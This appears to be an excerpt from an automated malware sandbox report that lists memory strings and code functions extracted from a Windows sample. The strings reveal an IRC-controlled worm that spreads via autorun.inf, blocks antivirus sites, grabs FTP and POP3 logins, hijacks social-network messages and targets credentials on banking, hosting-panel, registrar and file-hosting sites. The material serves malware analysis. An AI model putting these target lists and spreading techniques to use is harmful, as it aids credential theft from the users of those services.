            Source: QgGhoOpxHPl.exe, 00000020.00000002.621089259.0000000000390000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000020.00000002.621089259.0000000000390000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000020.00000002.621089259.0000000000390000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe | Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe | Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe | Binary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000021.00000002.620364062.0000000000090000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000021.00000002.620364062.0000000000090000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000021.00000002.620364062.0000000000090000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000021.00000002.620364062.0000000000090000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000021.00000002.620364062.0000000000090000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe | Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe | Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe | Binary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000022.00000002.620590554.0000000000220000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000022.00000002.620590554.0000000000220000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000022.00000002.620590554.0000000000220000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000022.00000002.620590554.0000000000220000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000022.00000002.620590554.0000000000220000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe | Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe | Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe | Binary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000023.00000002.620504431.0000000000150000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000023.00000002.620504431.0000000000150000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000023.00000002.620504431.0000000000150000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000023.00000002.620504431.0000000000150000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000023.00000002.620504431.0000000000150000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe | Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe | Binary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe | Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000024.00000002.621653908.00000000007F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000024.00000002.621653908.00000000007F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000024.00000002.621653908.00000000007F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL 
'%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000024.00000002.621653908.00000000007F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000025.00000002.620568966.0000000000250000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000025.00000002.620568966.0000000000250000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000025.00000002.620568966.0000000000250000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000026.00000002.620636229.0000000000260000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000026.00000002.620636229.0000000000260000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000026.00000002.620636229.0000000000260000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000027.00000002.621284956.00000000003F0000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000027.00000002.621284956.00000000003F0000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000027.00000002.621284956.00000000003F0000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000028.00000002.621275200.00000000003F0000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000028.00000002.621275200.00000000003F0000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000028.00000002.621275200.00000000003F0000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000029.00000002.620984806.0000000000280000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000029.00000002.620984806.0000000000280000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000029.00000002.620984806.0000000000280000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000002A.00000002.620410514.0000000000100000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000002A.00000002.620410514.0000000000100000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000002A.00000002.620410514.0000000000100000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: shellexecute=[autorun]
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 0_2_006045E0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, | 0_2_006045E0
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 2_2_006045E0 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, | 2_2_006045E0
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_0036F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 4_2_0036F130
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_0040F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 4_2_0040F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 9_2_003DF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 9_2_003DF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 10_2_0018F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 10_2_0018F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 11_2_0038F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose, | 11_2_0038F130
